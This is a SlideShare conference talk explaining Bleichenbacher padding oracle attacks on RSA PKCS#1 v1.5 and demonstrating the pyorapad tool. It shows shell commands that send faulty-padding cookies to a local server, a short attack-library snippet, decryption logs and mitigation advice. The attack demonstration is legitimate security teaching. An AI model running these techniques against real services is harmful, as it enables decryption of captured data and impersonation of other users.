SlideShare une entreprise Scribd logo

Practical rsa padding oracle attacks

Télécharger en tant que PPTX, PDF
A
Alexandre Moneger

This document discusses padding oracle attacks against RSA encryption. It begins with an overview of textbook RSA and how padding like PKCS#1 v1.5 addresses issues like predictability and malleability. It then explains what a padding oracle is and how the Bleichenbacher attack allows decrypting ciphertexts by querying a padding oracle repeatedly. The document demonstrates generating faulty padding, sending requests to a padding oracle, and using the responses to conduct the Bleichenbacher attack and recover the plaintext. It emphasizes that padding oracles are a real vulnerability and outlines approaches to mitigate risks.

Ingénierie
1  sur  22
Practical RSA padding oracle Attacks Alex Moneger Security Engineer – Cisco Systems 03/12/2014
Agenda 1. Textbook RSA problems 2. PKCS1_v1.5 format 3. Padding oracles, what’s that? 4. Bleichenbacher attack 5. Tooling
Textbook RSA? • Ciphertext = cleartext e % n • Cleartext is a number which cannot be larger than the keysize • RSA with no padding is referred to as Textbook RSA • It has problems: – It’s predictable, same encrypted result for same cleartext input – It’s malleable, due to homomorphism
Textbook RSA problems • Predictability: ➜ pyorapad git:(master) ✗ ./rsa_test_client.py keypairs/256.pub "05" 42f7816006de56bc4899a96645dff79227b6ebe40e6c82363c35b07fe4e8d63b ➜ pyorapad git:(master) ✗ ./rsa_test_client.py keypairs/256.pub "05" 42f7816006de56bc4899a96645dff79227b6ebe40e6c82363c35b07fe4e8d63b • Malleability ➜ pyorapad git:(master) ✗ ./rsa_test_client.py keypairs/256.pub "02" 4129a5c8ade1f1a001fef7a6eedbde3d751c9897cbe9762ebb6c968d4046bd08 ➜ pyorapad git:(master) ✗ ./rsa_test_client.py keypairs/256.pub "03" 7025b707f05ad5d7148f01eaf17fda3aac178f4aa48ace00bc8ef6ecf4ce40eb >>> hex((two * three) % n) '0x2d06ea3806280fddaa35137e3d2bad0152d512a23368c65470dbb5072685a50eL' ➜ pyorapad git:(master) ✗ ./pkcs1_test_oracle.py keypairs/256.priv 2d06ea3806280fddaa35137e3d2bad0152d512a23368c65470dbb5072685a50e 2> /dev/null 0000000000000000000000000000000000000000000000000000000000000006
Solutions • Add random padding • Several proposals: – PKCS1 v1.5 – PKCS1 v2.0 referred to as OAEP • Add random bytes in front of the cleartext before encryption • Addresses the problems of predictability and malleability
Problems fixed (PKCS1 v1.5 example) • Predictability ➜ pyorapad git:(master) ✗ ./pkcs1_test_client.py -f keypairs/256.pub -x "03" 061b8a582937938990c284fda22c8016af6b729ff4ef1dc938917321fdfef893 ➜ pyorapad git:(master) ✗ ./pkcs1_test_client.py -f keypairs/256.pub -x "03" 297a509da9dc28d6f052febb3c6ae265e6e2905f851e380a5c9a03de519c5c7b • Malleability ➜ pyorapad git:(master) ✗ ./pkcs1_test_client.py -f keypairs/256.pub -x "02" 76054771607245a9ad162b4aacb1573c444da8d4c1c7e5afaa3679b383d8fd6b ➜ pyorapad git:(master) ✗ ./pkcs1_test_client.py -f keypairs/256.pub -x "03” ae367c29f4fb340d02c7fae4bd43e699e50afae443f41c1383d49d927d5ff5fd >>> hex((two * three) % n) '0x79f58ce744adb456c35e1391e7dba658a9acece7d400958cebeb385450d925ecL' ➜ pyorapad git:(master) ✗ ./pkcs1_test_client.py -f keypairs/256.pub -x "06" c89593ba78d465d94eb8fab8fccfcfe94ade1369a849671ccc256dc52b009e62
PKCS1 v1.5 • Specifies a padding format • Which looks like this: 1. A header: “x00x02” 2. Some random bytes (minimum 8) 3. A delimiter “x00” 4. Data ➜ pyorapad git:(master) ✗ ./pkcs1_test_client.py -f keypairs/256.pub -c -x • Pretty simple in reality (e.g: for 0x123456789a) "123456789a" 0002c14dcfc27870fa657d0a3446e6571c7f626342e59c1777c600123456789a
Summary • Textbook RSA has problems • Padding solves most of them Are we done?
Oh no, wait… • What’s a padding oracle • A padding oracle is something which can tell you whether: – Padding is correct – Or not • E.g: – You failed authentication => HTTP 403 – The padding of your authentication request is invalid => HTTP 500
What can you do with this? • Padding oracles generally allow you to decrypt a given ciphertext • By querying the oracle repeatedly • Use cases: – Decrypt that cookie I captured for me please – Decrypt that X that I captured through Y • Allows “out of band” decryption of some data blob • Does not allow to retrieve the private
Bleichenbacher attack • Is a padding oracle attack on PKCS1 v1.5 • Original paper from 1998 available here • Given an oracle which: – Uses PKCS1 v1.5 padding – Can tell you if RSA decryption failed due to incorrect padding • You can: – retrieve the associated cleartext – by issuing a high number of request (~1 million) – Private key is NOT retrieved
How does it work • Remember that RSA is homomorphic • That PKCS1 v1.5 starts with a fixed header “x00x02”: – Cleartext is in a given range (0x000200..00 to 0x0002ff..ff) • I’ll spare the math, but the general idea is: 1. Acquire your target ciphertext (c) 2. Pick a carefully chosen number (s) 3. Encrypt it using the same key as your ciphertext (cs) 4. Multiply cs by c 5. Query oracle. Is the padding valid? 6. If no, increase s and try again
How does it work (2) • Once in the PKCS1 v1.5 interval • Choose s even more carefully (choice of s is the beauty of it) • S influences the search interval, so you slowly converge on cleartext m • Finally get m • Easy, any tools please?
Tooling • No available general use tools • Now there is one: pyorapad • Allows: 1. Generation of faulty padding 2. Sending the payload 3. Recording responses 4. Recording response times • Response times can be used as a side channel to carry out the padding oracle attack
Faulty padding • Given a public key • Generate messages with faulty padding ➜ pyorapad git:(master) ✗ ./pkcs1_test_client.py -f keypairs/256.pub -c -x "3de553c5e7" -4 -5 00020ddae5009fcab758b81559a28101274ccf522acd1ddb8b08003de553c5e7 0002220faab241ef7643a519d39db2c4b6aea6d4b4398c84eaefff3de553c5e7 ➜ pyorapad git:(master) ✗ ./pkcs1_test_client.py -f keypairs/256.pub -x "3de553c5e7" -4 -5 49a0ee1fea1ce4795227709bad74cc948745e8643528d152220e6106bd612499 a9e451901e73deda46d73ce49e98aa381100ac2fd7f697c726ea4c3ce445502f
Sending it • Pipe faulty padding and send it • Record answers and timings: ➜ pyorapad git:(master) ✗ ./pkcs1_test_client.py -f keypairs/256.pub "3de553c5e7" -a | http_proxy="http://127.0.0.1:8080" ./http_client.py -u 'http://127.0.0.1:8000' -p Cookie="%s" -i 1 Code: 403 Duration: 0.035813 Code: 403 Duration: 0.049567 Code: 403 Duration: 0.048423 Code: 403 Duration: 0.048562 Code: 500 Duration: 0.088740 • The last case is problematic! Attack time
Attacking • Offers a high level library to exploit Bleichenbacher type attacks o = HttpOracle("http://127.0.0.1", headers={"Cookie":"%0128x”}) b = Bleichenbacher.pubkey_from_file("pubkey.pem", o, callback) s1, i = b.run_search("49affbbe68d923e9cd1d2420fec72aea432b5a119df51f1bba89aa1245eeb627d 6809eeebb02db75746df85435735e6e6d11067d77c66da23b7722051141bb19") • S1 will hold the cleartext • A search can take several hours or days • Just need to define a callback to parse the oracle output
Phase 1 in practice • Phase 1, searching s (longest phase): DEBUG:padding:Sending task 1 to processing pool: DEBUG:padding: Iteration 1 in task 1 DEBUG:padding: S value: 14127 DEBUG:padding:Sending task 1 to processing pool: DEBUG:padding: Iteration 2 in task 1 DEBUG:padding: S value: 14128 … DEBUG:padding:Result for task: DEBUG:padding: Found in iteration 28172 of task: 1 DEBUG:padding: S value: 42298 INFO:padding:Found PKCS1 conforming message in 28172 iterations for s value: 42298 • We’re now “hooked” into the PKCS1 v1.5 interval
Phase 2 in practice • Reducing interval to converge on solution … DEBUG:padding:Calculated interval value: DEBUG:padding: Interval size: 40823541321782616790910632524571305518187877504783604447718694644058771663210372967273792647688025842927 17546734416777529449792040180675967627003571248801 … DEBUG:padding:Calculated interval value: DEBUG:padding: Interval size: 4 DEBUG:padding:Calculated interval value: DEBUG:padding: Interval size: 1 DEBUG:padding:Calculated interval value: DEBUG:padding: Interval size: 0 INFO:padding:Found cleartext solution: • Interval converges slowly towards a single value
Results • The last value in the interval is the solution modulo n INFO:padding:Found cleartext solution: INFO:padding: Ciphertext: 18681313587286062135641889229443920979611342782804412111835243686702683071852572419018410834829448119386 86720657288292677215259003956544339524232742829748406492933128999307317683781855531201894097516268131263 9598207414124657744840104859510085525087292502071319630148404307172662102999050705457979498491993909 => 1a9a63081c997974c623e403d7ce6c634716bb387b0f3de975cc3b73db801eb5ed073d80386c8d5e4c8d041eff8b753a184be297 58cceff7600b4ac86447f213703c86f6f705b455b7f93d61591f7a9baf8d0801860a00a68e3a5078fb69abba645670688bb21703 7626dd0ed5c71453d943c9ee48740ed8bc942b9016aadf35 INFO:padding: Cleartext: 72020527656168419129180658335700123142641116633256876460051178807689242604576122345613220129310606314687 45212219072285304055053719717450688437311913116051107249237406698225122488575471036399864282335516394596 442995388467772421125059520611341232370853335240259245614392043581284333901821459787338531300663 => 2a02431a438e0ea2aeb8daa3eb01804ae336465353534825c466acf11cdd9ed248a08b9e35ea1f9c7081ed3c1d29c20770b1a193 7e4aebd9f9e81146b74e18ca7e69698c8adbd33c817d711db5542d9dd3c617fdc1f345ba4586233c3b4658b55b469c4c93e4cdc5 c31793562c6d952bacf6cf25cd0b3a91a4003de553c5e7 INFO:padding:Stopped all worker threads in the pool
Practicality • This attack is not theoretical • Worked in the field (now fixed): – Allowed decryption of “customer specific” encrypted blob – Which then allowed to pass traffic as those customers (privilege escalation) • Is applicable to anything which can process many requests: – Smartcards – Cloud services – Network devices • It’s not that hard. Do not underestimate padding oracles
Conclusion • Padding oracles affect CBC mode and RSA • Most paddings are vulnerable (including OAEP) • Make sure your padding oracles are fixed • Especially if customer/network facing • Fixing also means giving no timing hints (which is awfully hard) • Authenticate your crypto (encryption is not authentication) • Authenticate your crypto after encryption

Recommandé

NBTC#2 - Why instrumentation is cooler then ice
NBTC#2 - Why instrumentation is cooler then iceNBTC#2 - Why instrumentation is cooler then ice
NBTC#2 - Why instrumentation is cooler then iceAlexandre Moneger
 
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...Alexandre Moneger
 
Pentesting custom TLS stacks
Pentesting custom TLS stacksPentesting custom TLS stacks
Pentesting custom TLS stacksAlexandre Moneger
 
Scapy TLS: A scriptable TLS 1.3 stack
Scapy TLS: A scriptable TLS 1.3 stackScapy TLS: A scriptable TLS 1.3 stack
Scapy TLS: A scriptable TLS 1.3 stackAlexandre Moneger
 
CNIT 141 8. Authenticated Encryption
CNIT 141 8. Authenticated EncryptionCNIT 141 8. Authenticated Encryption
CNIT 141 8. Authenticated EncryptionSam Bowne
 
Cryptography and secure systems
Cryptography and secure systemsCryptography and secure systems
Cryptography and secure systemsVsevolod Stakhov
 
CNIT 141 7. Keyed Hashing
CNIT 141 7. Keyed HashingCNIT 141 7. Keyed Hashing
CNIT 141 7. Keyed HashingSam Bowne
 
CNIT 127 14: Protection Mechanisms
CNIT 127 14: Protection MechanismsCNIT 127 14: Protection Mechanisms
CNIT 127 14: Protection MechanismsSam Bowne
 

Recommandé

NBTC#2 - Why instrumentation is cooler then ice
NBTC#2 - Why instrumentation is cooler then iceNBTC#2 - Why instrumentation is cooler then ice
NBTC#2 - Why instrumentation is cooler then iceAlexandre Moneger
 
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...Alexandre Moneger
 
Pentesting custom TLS stacks
Pentesting custom TLS stacksPentesting custom TLS stacks
Pentesting custom TLS stacksAlexandre Moneger
 
Scapy TLS: A scriptable TLS 1.3 stack
Scapy TLS: A scriptable TLS 1.3 stackScapy TLS: A scriptable TLS 1.3 stack
Scapy TLS: A scriptable TLS 1.3 stackAlexandre Moneger
 
CNIT 141 8. Authenticated Encryption
CNIT 141 8. Authenticated EncryptionCNIT 141 8. Authenticated Encryption
CNIT 141 8. Authenticated EncryptionSam Bowne
 
Cryptography and secure systems
Cryptography and secure systemsCryptography and secure systems
Cryptography and secure systemsVsevolod Stakhov
 
CNIT 141 7. Keyed Hashing
CNIT 141 7. Keyed HashingCNIT 141 7. Keyed Hashing
CNIT 141 7. Keyed HashingSam Bowne
 
CNIT 127 14: Protection Mechanisms
CNIT 127 14: Protection MechanismsCNIT 127 14: Protection Mechanisms
CNIT 127 14: Protection MechanismsSam Bowne
 
rspamd-fosdem
rspamd-fosdemrspamd-fosdem
rspamd-fosdemVsevolod Stakhov
 
CNIT 141: 4. Block Ciphers
CNIT 141: 4. Block CiphersCNIT 141: 4. Block Ciphers
CNIT 141: 4. Block CiphersSam Bowne
 
CNIT 141: 1. Encryption
CNIT 141: 1. EncryptionCNIT 141: 1. Encryption
CNIT 141: 1. EncryptionSam Bowne
 
CNIT 141: 8. Authenticated Encryption
CNIT 141: 8. Authenticated EncryptionCNIT 141: 8. Authenticated Encryption
CNIT 141: 8. Authenticated EncryptionSam Bowne
 
An EyeWitness View into your Network
An EyeWitness View into your NetworkAn EyeWitness View into your Network
An EyeWitness View into your NetworkCTruncer
 
Applied cryptanalysis - everything else
Applied cryptanalysis - everything elseApplied cryptanalysis - everything else
Applied cryptanalysis - everything elseVlad Garbuz
 
rspamd-slides
rspamd-slidesrspamd-slides
rspamd-slidesVsevolod Stakhov
 
CheckPlease - Payload-Agnostic Implant Security
CheckPlease - Payload-Agnostic Implant SecurityCheckPlease - Payload-Agnostic Implant Security
CheckPlease - Payload-Agnostic Implant SecurityBrandon Arvanaghi
 
rspamd-hyperscan
rspamd-hyperscanrspamd-hyperscan
rspamd-hyperscanVsevolod Stakhov
 
Hacking Blind
Hacking BlindHacking Blind
Hacking BlindNikitaAndhale
 
CNIT 127: Ch 18: Source Code Auditing
CNIT 127: Ch 18: Source Code AuditingCNIT 127: Ch 18: Source Code Auditing
CNIT 127: Ch 18: Source Code AuditingSam Bowne
 
CNIT 127: 3: Shellcode
CNIT 127: 3: ShellcodeCNIT 127: 3: Shellcode
CNIT 127: 3: ShellcodeSam Bowne
 
Common technique in Bypassing Stuff in Python.
Common technique in Bypassing Stuff in Python.Common technique in Bypassing Stuff in Python.
Common technique in Bypassing Stuff in Python.Shahriman .
 
CNIT 141: 5. Stream Ciphers
CNIT 141: 5. Stream CiphersCNIT 141: 5. Stream Ciphers
CNIT 141: 5. Stream CiphersSam Bowne
 
AV Evasion with the Veil Framework
AV Evasion with the Veil FrameworkAV Evasion with the Veil Framework
AV Evasion with the Veil FrameworkVeilFramework
 
Использование KASan для автономного гипервизора
Использование KASan для автономного гипервизораИспользование KASan для автономного гипервизора
Использование KASan для автономного гипервизораPositive Hack Days
 
Ch 5: Port Scanning
Ch 5: Port ScanningCh 5: Port Scanning
Ch 5: Port ScanningSam Bowne
 
SSL Checklist for Pentesters (BSides MCR 2014)
SSL Checklist for Pentesters (BSides MCR 2014)SSL Checklist for Pentesters (BSides MCR 2014)
SSL Checklist for Pentesters (BSides MCR 2014)Jerome Smith
 
Applied cryptanalysis - stream ciphers
Applied cryptanalysis - stream ciphersApplied cryptanalysis - stream ciphers
Applied cryptanalysis - stream ciphersVlad Garbuz
 
Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...
Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...
Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...Cybersecurity Education and Research Centre
 
0 to 31337 Real Quick: Lessons Learned by Reversing the Flare-On Challenge
0 to 31337 Real Quick: Lessons Learned by Reversing the Flare-On Challenge0 to 31337 Real Quick: Lessons Learned by Reversing the Flare-On Challenge
0 to 31337 Real Quick: Lessons Learned by Reversing the Flare-On ChallengeBlaine Stancill
 
Quick Wins
Quick WinsQuick Wins
Quick WinsHighLoad2009
 

Contenu connexe

Tendances

CNIT 141: 4. Block Ciphers
CNIT 141: 4. Block CiphersCNIT 141: 4. Block Ciphers
CNIT 141: 4. Block CiphersSam Bowne
 
CNIT 141: 1. Encryption
CNIT 141: 1. EncryptionCNIT 141: 1. Encryption
CNIT 141: 1. EncryptionSam Bowne
 
CNIT 141: 8. Authenticated Encryption
CNIT 141: 8. Authenticated EncryptionCNIT 141: 8. Authenticated Encryption
CNIT 141: 8. Authenticated EncryptionSam Bowne
 
An EyeWitness View into your Network
An EyeWitness View into your NetworkAn EyeWitness View into your Network
An EyeWitness View into your NetworkCTruncer
 
Applied cryptanalysis - everything else
Applied cryptanalysis - everything elseApplied cryptanalysis - everything else
Applied cryptanalysis - everything elseVlad Garbuz
 
CheckPlease - Payload-Agnostic Implant Security
CheckPlease - Payload-Agnostic Implant SecurityCheckPlease - Payload-Agnostic Implant Security
CheckPlease - Payload-Agnostic Implant SecurityBrandon Arvanaghi
 
CNIT 127: Ch 18: Source Code Auditing
CNIT 127: Ch 18: Source Code AuditingCNIT 127: Ch 18: Source Code Auditing
CNIT 127: Ch 18: Source Code AuditingSam Bowne
 
CNIT 127: 3: Shellcode
CNIT 127: 3: ShellcodeCNIT 127: 3: Shellcode
CNIT 127: 3: ShellcodeSam Bowne
 
Common technique in Bypassing Stuff in Python.
Common technique in Bypassing Stuff in Python.Common technique in Bypassing Stuff in Python.
Common technique in Bypassing Stuff in Python.Shahriman .
 
CNIT 141: 5. Stream Ciphers
CNIT 141: 5. Stream CiphersCNIT 141: 5. Stream Ciphers
CNIT 141: 5. Stream CiphersSam Bowne
 
AV Evasion with the Veil Framework
AV Evasion with the Veil FrameworkAV Evasion with the Veil Framework
AV Evasion with the Veil FrameworkVeilFramework
 
Использование KASan для автономного гипервизора
Использование KASan для автономного гипервизораИспользование KASan для автономного гипервизора
Использование KASan для автономного гипервизораPositive Hack Days
 
Ch 5: Port Scanning
Ch 5: Port ScanningCh 5: Port Scanning
Ch 5: Port ScanningSam Bowne
 
SSL Checklist for Pentesters (BSides MCR 2014)
SSL Checklist for Pentesters (BSides MCR 2014)SSL Checklist for Pentesters (BSides MCR 2014)
SSL Checklist for Pentesters (BSides MCR 2014)Jerome Smith
 
Applied cryptanalysis - stream ciphers
Applied cryptanalysis - stream ciphersApplied cryptanalysis - stream ciphers
Applied cryptanalysis - stream ciphersVlad Garbuz
 
Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...
Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...
Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...Cybersecurity Education and Research Centre
 

Tendances (20)

rspamd-fosdem
rspamd-fosdemrspamd-fosdem
rspamd-fosdem
 
CNIT 141: 4. Block Ciphers
CNIT 141: 4. Block CiphersCNIT 141: 4. Block Ciphers
CNIT 141: 4. Block Ciphers
 
CNIT 141: 1. Encryption
CNIT 141: 1. EncryptionCNIT 141: 1. Encryption
CNIT 141: 1. Encryption
 
CNIT 141: 8. Authenticated Encryption
CNIT 141: 8. Authenticated EncryptionCNIT 141: 8. Authenticated Encryption
CNIT 141: 8. Authenticated Encryption
 
An EyeWitness View into your Network
An EyeWitness View into your NetworkAn EyeWitness View into your Network
An EyeWitness View into your Network
 
Applied cryptanalysis - everything else
Applied cryptanalysis - everything elseApplied cryptanalysis - everything else
Applied cryptanalysis - everything else
 
rspamd-slides
rspamd-slidesrspamd-slides
rspamd-slides
 
CheckPlease - Payload-Agnostic Implant Security
CheckPlease - Payload-Agnostic Implant SecurityCheckPlease - Payload-Agnostic Implant Security
CheckPlease - Payload-Agnostic Implant Security
 
rspamd-hyperscan
rspamd-hyperscanrspamd-hyperscan
rspamd-hyperscan
 
Hacking Blind
Hacking BlindHacking Blind
Hacking Blind
 
CNIT 127: Ch 18: Source Code Auditing
CNIT 127: Ch 18: Source Code AuditingCNIT 127: Ch 18: Source Code Auditing
CNIT 127: Ch 18: Source Code Auditing
 
CNIT 127: 3: Shellcode
CNIT 127: 3: ShellcodeCNIT 127: 3: Shellcode
CNIT 127: 3: Shellcode
 
Common technique in Bypassing Stuff in Python.
Common technique in Bypassing Stuff in Python.Common technique in Bypassing Stuff in Python.
Common technique in Bypassing Stuff in Python.
 
CNIT 141: 5. Stream Ciphers
CNIT 141: 5. Stream CiphersCNIT 141: 5. Stream Ciphers
CNIT 141: 5. Stream Ciphers
 
AV Evasion with the Veil Framework
AV Evasion with the Veil FrameworkAV Evasion with the Veil Framework
AV Evasion with the Veil Framework
 
Использование KASan для автономного гипервизора
Использование KASan для автономного гипервизораИспользование KASan для автономного гипервизора
Использование KASan для автономного гипервизора
 
Ch 5: Port Scanning
Ch 5: Port ScanningCh 5: Port Scanning
Ch 5: Port Scanning
 
SSL Checklist for Pentesters (BSides MCR 2014)
SSL Checklist for Pentesters (BSides MCR 2014)SSL Checklist for Pentesters (BSides MCR 2014)
SSL Checklist for Pentesters (BSides MCR 2014)
 
Applied cryptanalysis - stream ciphers
Applied cryptanalysis - stream ciphersApplied cryptanalysis - stream ciphers
Applied cryptanalysis - stream ciphers
 
Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...
Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...
Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...
 

Similaire à Practical rsa padding oracle attacks

0 to 31337 Real Quick: Lessons Learned by Reversing the Flare-On Challenge
0 to 31337 Real Quick: Lessons Learned by Reversing the Flare-On Challenge0 to 31337 Real Quick: Lessons Learned by Reversing the Flare-On Challenge
0 to 31337 Real Quick: Lessons Learned by Reversing the Flare-On ChallengeBlaine Stancill
 
Modern Linux Tracing Landscape
Modern Linux Tracing LandscapeModern Linux Tracing Landscape
Modern Linux Tracing LandscapeSasha Goldshtein
 
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey GordeychikCODE BLUE
 
Ceph Day Melbourne - Troubleshooting Ceph
Ceph Day Melbourne - Troubleshooting Ceph Ceph Day Melbourne - Troubleshooting Ceph
Ceph Day Melbourne - Troubleshooting Ceph Ceph Community
 
An Embedded Error Recovery and Debugging Mechanism for Scripting Language Ext...
An Embedded Error Recovery and Debugging Mechanism for Scripting Language Ext...An Embedded Error Recovery and Debugging Mechanism for Scripting Language Ext...
An Embedded Error Recovery and Debugging Mechanism for Scripting Language Ext...David Beazley (Dabeaz LLC)
 
Get Your Insecure PostgreSQL Passwords to SCRAM
Get Your Insecure PostgreSQL Passwords to SCRAMGet Your Insecure PostgreSQL Passwords to SCRAM
Get Your Insecure PostgreSQL Passwords to SCRAMJonathan Katz
 
Filippo, Plain simple reality of entropy
Filippo, Plain simple reality of entropyFilippo, Plain simple reality of entropy
Filippo, Plain simple reality of entropyPacSecJP
 
PHP 7.1 : elegance of our legacy
PHP 7.1 : elegance of our legacyPHP 7.1 : elegance of our legacy
PHP 7.1 : elegance of our legacyDamien Seguy
 
CQURE_BHAsia19_Paula_Januszkiewicz_slides
CQURE_BHAsia19_Paula_Januszkiewicz_slidesCQURE_BHAsia19_Paula_Januszkiewicz_slides
CQURE_BHAsia19_Paula_Januszkiewicz_slidesZuzannaKornecka
 
Pre New Year Check of PostgreSQL
Pre New Year Check of PostgreSQLPre New Year Check of PostgreSQL
Pre New Year Check of PostgreSQLAndrey Karpov
 
Safely Protect PostgreSQL Passwords - Tell Others to SCRAM
Safely Protect PostgreSQL Passwords - Tell Others to SCRAMSafely Protect PostgreSQL Passwords - Tell Others to SCRAM
Safely Protect PostgreSQL Passwords - Tell Others to SCRAMJonathan Katz
 
Bitcoin Keys, Addresses & Wallets
Bitcoin Keys, Addresses & WalletsBitcoin Keys, Addresses & Wallets
Bitcoin Keys, Addresses & WalletsChristopher Allen
 
Kettunen, miaubiz fuzzing at scale and in style
Kettunen, miaubiz fuzzing at scale and in styleKettunen, miaubiz fuzzing at scale and in style
Kettunen, miaubiz fuzzing at scale and in styleDefconRussia
 
Sasi, cassandra on the full text search ride At Voxxed Day Belgrade 2016
Sasi, cassandra on the full text search ride At Voxxed Day Belgrade 2016Sasi, cassandra on the full text search ride At Voxxed Day Belgrade 2016
Sasi, cassandra on the full text search ride At Voxxed Day Belgrade 2016Duyhai Doan
 
In Memory Database In Action by Tanel Poder and Kerry Osborne
In Memory Database In Action by Tanel Poder and Kerry OsborneIn Memory Database In Action by Tanel Poder and Kerry Osborne
In Memory Database In Action by Tanel Poder and Kerry OsborneEnkitec
 
Oracle Database In-Memory Option in Action
Oracle Database In-Memory Option in ActionOracle Database In-Memory Option in Action
Oracle Database In-Memory Option in ActionTanel Poder
 

Similaire à Practical rsa padding oracle attacks (20)

0 to 31337 Real Quick: Lessons Learned by Reversing the Flare-On Challenge
0 to 31337 Real Quick: Lessons Learned by Reversing the Flare-On Challenge0 to 31337 Real Quick: Lessons Learned by Reversing the Flare-On Challenge
0 to 31337 Real Quick: Lessons Learned by Reversing the Flare-On Challenge
 
Quick Wins
Quick WinsQuick Wins
Quick Wins
 
Modern Linux Tracing Landscape
Modern Linux Tracing LandscapeModern Linux Tracing Landscape
Modern Linux Tracing Landscape
 
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
 
Ceph Day Melbourne - Troubleshooting Ceph
Ceph Day Melbourne - Troubleshooting Ceph Ceph Day Melbourne - Troubleshooting Ceph
Ceph Day Melbourne - Troubleshooting Ceph
 
An Embedded Error Recovery and Debugging Mechanism for Scripting Language Ext...
An Embedded Error Recovery and Debugging Mechanism for Scripting Language Ext...An Embedded Error Recovery and Debugging Mechanism for Scripting Language Ext...
An Embedded Error Recovery and Debugging Mechanism for Scripting Language Ext...
 
Get Your Insecure PostgreSQL Passwords to SCRAM
Get Your Insecure PostgreSQL Passwords to SCRAMGet Your Insecure PostgreSQL Passwords to SCRAM
Get Your Insecure PostgreSQL Passwords to SCRAM
 
Filippo, Plain simple reality of entropy
Filippo, Plain simple reality of entropyFilippo, Plain simple reality of entropy
Filippo, Plain simple reality of entropy
 
Hotsos Advanced Linux Tools
Hotsos Advanced Linux ToolsHotsos Advanced Linux Tools
Hotsos Advanced Linux Tools
 
PHP 7.1 : elegance of our legacy
PHP 7.1 : elegance of our legacyPHP 7.1 : elegance of our legacy
PHP 7.1 : elegance of our legacy
 
CQURE_BHAsia19_Paula_Januszkiewicz_slides
CQURE_BHAsia19_Paula_Januszkiewicz_slidesCQURE_BHAsia19_Paula_Januszkiewicz_slides
CQURE_BHAsia19_Paula_Januszkiewicz_slides
 
Class3
Class3Class3
Class3
 
Pre New Year Check of PostgreSQL
Pre New Year Check of PostgreSQLPre New Year Check of PostgreSQL
Pre New Year Check of PostgreSQL
 
Safely Protect PostgreSQL Passwords - Tell Others to SCRAM
Safely Protect PostgreSQL Passwords - Tell Others to SCRAMSafely Protect PostgreSQL Passwords - Tell Others to SCRAM
Safely Protect PostgreSQL Passwords - Tell Others to SCRAM
 
Bitcoin Keys, Addresses & Wallets
Bitcoin Keys, Addresses & WalletsBitcoin Keys, Addresses & Wallets
Bitcoin Keys, Addresses & Wallets
 
Kettunen, miaubiz fuzzing at scale and in style
Kettunen, miaubiz fuzzing at scale and in styleKettunen, miaubiz fuzzing at scale and in style
Kettunen, miaubiz fuzzing at scale and in style
 
Sasi, cassandra on the full text search ride At Voxxed Day Belgrade 2016
Sasi, cassandra on the full text search ride At Voxxed Day Belgrade 2016Sasi, cassandra on the full text search ride At Voxxed Day Belgrade 2016
Sasi, cassandra on the full text search ride At Voxxed Day Belgrade 2016
 
All The Little Pieces
All The Little PiecesAll The Little Pieces
All The Little Pieces
 
In Memory Database In Action by Tanel Poder and Kerry Osborne
In Memory Database In Action by Tanel Poder and Kerry OsborneIn Memory Database In Action by Tanel Poder and Kerry Osborne
In Memory Database In Action by Tanel Poder and Kerry Osborne
 
Oracle Database In-Memory Option in Action
Oracle Database In-Memory Option in ActionOracle Database In-Memory Option in Action
Oracle Database In-Memory Option in Action
 

Plus de Alexandre Moneger

Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbersDefcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbersAlexandre Moneger
 
03 - Refresher on buffer overflow in the old days
03 - Refresher on buffer overflow in the old days03 - Refresher on buffer overflow in the old days
03 - Refresher on buffer overflow in the old daysAlexandre Moneger
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W mattersAlexandre Moneger
 
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stackAlexandre Moneger
 
06 - ELF format, knowing your friend
06 - ELF format, knowing your friend06 - ELF format, knowing your friend
06 - ELF format, knowing your friendAlexandre Moneger
 
05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR mattersAlexandre Moneger
 
04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)Alexandre Moneger
 
